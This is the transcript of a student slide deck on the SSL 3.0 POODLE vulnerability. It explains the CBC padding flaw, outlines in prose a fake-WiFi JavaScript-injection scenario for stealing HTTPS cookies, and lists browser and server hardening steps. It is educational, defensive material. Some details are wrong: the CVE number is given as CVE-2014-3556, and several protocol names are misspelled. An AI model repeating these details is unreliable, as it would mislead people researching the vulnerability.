ssl poodle gavriliţ ă cristian cebanu ghenadie. contents history vulnerability description example...
TRANSCRIPT
SSL Poodle
Gavriliţă CristianCebanu Ghenadie
Contents
• History• Vulnerability description• Example• Remedies• Bibliography
History
• "Padding Oracle On Downgraded Legacy Encryption“
• CVE-2014-3556
• September, 2014
• Bodo Möller, Thai Duong, Krzysztof Kotowicz
• Google Security Team
Vulnerability Description
• It’s not an implementation vulnerability• It’s a design vulnerability• SSLv3 is affected with CBC encryption
Attack conditions
• Padding-ul ocupă un bloc întreg (criptat în C n).• Primul byte din cookie încă necunoscut, apare
ca un ultim byte într-un bloc anterior (criptat ca şi Cj)
Core Point
• SSL 3.0 is defined as ignoring the padding bytes (except the last). These bytes are not covered by the MAC and don't have any defined value
• TLS 1.0 is not vulnerable because in TLS 1.0, the protocol specifies that all padding bytes must have the same value, and libraries implementing TLS verify that these bytes have the expected values.
CBC encryption
CBC decryption
Practical attack
• The main and about only plausible scenario where such conditions are met is a Web context: the attacker runs a fake WiFi access point, and injects some Javascript of their own as part of a Web page (HTTP, not HTTPS) that the victim browses. The evil Javascript makes the browser send requests to a HTTPS site (say, a bank Web site) for which the victim's browser has a cookie. The attacker wants that cookie.
Remedies (Client side)• Firefox users can type about:config into their address bar and then
security.tls.version.min into the search box. This will bring up the setting that needs to be changed from 0 to 1.
Remedies (Client side)
• On Chrome you can add the command line flag --ssl-version-min=tls1
Remedies (Client side)
• Fixing up Internet Explorer is also pretty easy. Go to Settings, Internet Options and click on the Advanced tab. Scroll down until you see the Use SSL 3.0 checkbox and uncheck it
Remedies (Server side)
• Ngnix– ssl_protocols TLSv1 TLSv1.1 TLSv1.2– sudo nginx –t – sudo service nginx restart
Remedies (Server side)
• HKey_Local_Machine\System\CurrentControlSet\Control\SecurityProviders \SCHANNEL\Protocols
Remedies (Server side)
• Apache– SSLProtocol All -SSLv2 -SSLv3– apachectl configtest– sudo service apache2 restart
TLS_FALLBACK_SCSV
• TLS_FALBACK_SCSV • innapropriate_fallback
SSL3 protocol check in TOP 20 banks
• 2 Weeks after announcement of SSL Poodle vulnerability
• http://www.ssllabs.com/• From 20 analyzed bank:– 15 didn’t closed SSL3;– 2 used only SSL3;– 3 closed SSL3 completely;– 2 closed SSL3 only for individual persons;
www.info.uaic.ro
Conclusions
• SSLv3 - 1/256 (2-8)
• TLS 1/18446744073709551616 (2-64)
• [1] This Poodle Bites: Exploiting the SSL 3.0 Fallback, Bodo Moller, Thai Duong, Krzysztof Kotowicz, Google, Septembrie 2014
• [2] SSL V3 goes to the dogs - Poodle kills off protocol, https://scotthelme.co.uk/sslv3-goes-to-the-dogs-poodle-kills-off-protocol/
• [3] http://security.stackexchange.com/questions/70719/ssl3-poodle-vulnerability
• [4] http://habrahabr.ru/company/mailru/blog/241113/• [5] http://habrahabr.ru/company/first/blog/242493/• [6] https://support.microsoft.com/kb/187498/en-us